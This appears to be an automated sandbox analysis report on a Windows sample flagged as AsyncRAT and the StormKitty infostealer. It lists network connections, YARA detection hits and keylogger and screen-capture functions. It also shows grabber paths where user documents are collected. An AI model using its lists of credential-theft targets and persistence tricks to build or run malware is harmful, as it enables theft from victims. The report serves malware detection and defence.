Source: places.raw.6.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: places.raw.6.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmpD17D.tmp.dat.6.dr, tmpD1B0.tmp.dat.6.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: places.raw.6.dr	String found in binary or memory: https://www.mozilla.org
Source: places.raw.6.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: places.raw.6.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: places.raw.6.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: tmpD291.tmp.dat.6.dr, places.raw.6.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725

Source: unknown	HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.8:49729 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR

Contains functionality to capture screen (.Net source)

Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, DesktopScreenshot.cs	.Net Code: Make
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, DesktopScreenshot.cs	.Net Code: Make

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, Keylogger.cs	.Net Code: SetHook
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, Keylogger.cs	.Net Code: SetHook
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File deleted: C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN.xlsx	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File deleted: C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UOOJJOZIRH\MXPXCVPDVN.xlsx	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File deleted: C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL\SFPUSAFIOL.docx	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File deleted: C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\SFPUSAFIOL.pdf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File deleted: C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LSBIHQFDVT.xlsx	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: MSBuild.exe PID: 8040, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe

Code function: 0_2_075DAA58 CreateProcessAsUserW,

0_2_075DAA58

Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_02B26A98	0_2_02B26A98
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_02B24840	0_2_02B24840
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_02B27288	0_2_02B27288
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_02B2F108	0_2_02B2F108
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_02B24831	0_2_02B24831
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_02B2CE00	0_2_02B2CE00
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_02B2ADD8	0_2_02B2ADD8
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_02B2F0F8	0_2_02B2F0F8
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_05E607E8	0_2_05E607E8
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_05E607D8	0_2_05E607D8
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_05E60040	0_2_05E60040
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_06075CC8	0_2_06075CC8
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_06075C98	0_2_06075C98
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_06095B78	0_2_06095B78
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_07524DA8	0_2_07524DA8
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_0752F930	0_2_0752F930
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_0752F920	0_2_0752F920
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_07520658	0_2_07520658
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_07520649	0_2_07520649
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_0752FC21	0_2_0752FC21
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075DAFF0	0_2_075DAFF0
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D3A90	0_2_075D3A90
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D5D50	0_2_075D5D50
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D51F8	0_2_075D51F8
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D5430	0_2_075D5430
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D43C0	0_2_075D43C0
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D9388	0_2_075D9388
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075DF250	0_2_075DF250
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D0278	0_2_075D0278
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D0268	0_2_075D0268
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D4A28	0_2_075D4A28
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D0699	0_2_075D0699
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D7A98	0_2_075D7A98
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D7A89	0_2_075D7A89
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D3A80	0_2_075D3A80
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D06A8	0_2_075D06A8
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D3D30	0_2_075D3D30
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D11F0	0_2_075D11F0
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D11E9	0_2_075D11E9
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D51E8	0_2_075D51E8
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D8C58	0_2_075D8C58
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D0040	0_2_075D0040
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D541F	0_2_075D541F
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D0006	0_2_075D0006
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075D5898	0_2_075D5898
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075EE500	0_2_075EE500
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075ED5F0	0_2_075ED5F0
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075ECC2F	0_2_075ECC2F
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075EC4F8	0_2_075EC4F8
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075EA8E8	0_2_075EA8E8
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075EF3A8	0_2_075EF3A8
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075EB8C7	0_2_075EB8C7
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_075EC4C1	0_2_075EC4C1
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_077B0448	0_2_077B0448
Source: C:\Users\user\Desktop\Kh7W85ONS7.exe	Code function: 0_2_07524D8F	0_2_07524D8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_02D76390	6_2_02D76390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_02D75AC0	6_2_02D75AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_02D79750	6_2_02D79750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_02D75778	6_2_02D75778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_02D79760	6_2_02D79760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05AD05F0	6_2_05AD05F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05AD0600	6_2_05AD0600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05ADC108	6_2_05ADC108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05ADC0F7	6_2_05ADC0F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05AD5D60	6_2_05AD5D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_05AD5D53	6_2_05AD5D53

Source: Kh7W85ONS7.exe

Static PE information: invalid certificate

Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs Kh7W85ONS7.exe
Source: Kh7W85ONS7.exe, 00000000.00000002.2130710405.0000000007830000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRP8SH.dll, vs Kh7W85ONS7.exe
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClient.exe. vs Kh7W85ONS7.exe
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMiPro.dll, vs Kh7W85ONS7.exe
Source: Kh7W85ONS7.exe, 00000000.00000002.2128978665.0000000005D00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMiPro.dll, vs Kh7W85ONS7.exe
Source: Kh7W85ONS7.exe, 00000000.00000002.2127288804.0000000003CEE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMiPro.dll, vs Kh7W85ONS7.exe
Source: Kh7W85ONS7.exe, 00000000.00000002.2119768782.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Kh7W85ONS7.exe
Source: Kh7W85ONS7.exe, 00000000.00000000.1362090175.0000000000250000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNDP481-Web.exe^ vs Kh7W85ONS7.exe
Source: Kh7W85ONS7.exe, 00000000.00000000.1362090175.0000000000250000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBoxStub.exeT vs Kh7W85ONS7.exe
Source: Kh7W85ONS7.exe	Binary or memory string: OriginalFilenameNDP481-Web.exe^ vs Kh7W85ONS7.exe
Source: Kh7W85ONS7.exe	Binary or memory string: OriginalFilenameBoxStub.exeT vs Kh7W85ONS7.exe

Source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Kh7W85ONS7.exe.3c763d0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Kh7W85ONS7.exe.3bf4932.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000000.00000002.2127288804.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000006.00000002.2617809972.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000006.00000002.2613909834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000000.00000002.2127288804.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: Kh7W85ONS7.exe PID: 7368, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
